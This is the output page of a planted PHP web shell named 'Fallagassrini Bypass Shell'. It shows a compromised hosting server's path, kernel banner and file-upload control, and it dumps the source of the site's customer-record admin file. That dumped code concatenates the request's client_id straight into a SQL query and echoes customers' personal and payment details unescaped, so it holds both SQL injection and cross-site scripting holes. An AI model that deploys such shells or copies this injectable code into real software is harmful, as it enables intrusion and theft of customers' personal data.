Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/old/happy-and-pay.fr/administration/templates/admin3/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/old/happy-and-pay.fr/administration/templates/admin3/fiche_client.php

<?
session_start();
error_reporting(E_ALL);
ini_set('display_errors','On');

include("config.php");
$page="index";
$client_id		=	$_REQUEST['client_id'];
$myquery 		= "SELECT * from client where id=".$client_id;
$client 	= $db->get_row($myquery);
						
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title></title>
<script type='text/javascript' src='/js/lib/dummy.js'></script>
<link rel="stylesheet" type="text/css" href="/css/result-light.css">
</head>
<body>

<div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
     <h2 class="modal-title"><b><?echo $client->prenom;?> <?echo $client->nom;?> (<?echo date("d-m-Y", strtotime($client->date_creation));?>)</b></h2>
</div>
<div class="modal-body">
     <h4><?echo $client->adresse;?></h4>
	 <h4><?echo $client->cp;?> <?echo $client->ville;?></h4>
	 <h4><?echo $client->pays;?></h4>
	 <br>
	 <h4>Mail : <?echo $client->mail;?></h4>
	 <h4>Tél : <?echo $client->tel;?></h4>
	 <br>
	 <h4>Nationalité : <?echo $client->nationalite;?></h4>
	 <?if ($client->date_naissance!="0000-00-00") {?><h4>Né le : <?echo date("d-m-Y", strtotime($client->date_naissance));?></h4><?}?>
	 <?if ($client->mangopay_id) {?><h4><b>Mangopay : <?echo $client->mangopay_id;?></b></h4><?}?>
	 
	 
	 
	 
</div>
<div class="modal-footer">
<button type="button" class="btn default" onclick="javascript:window.location.reload()"  data-dismiss="modal" >Fermer</button>
</div>
</body>
</html>


bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net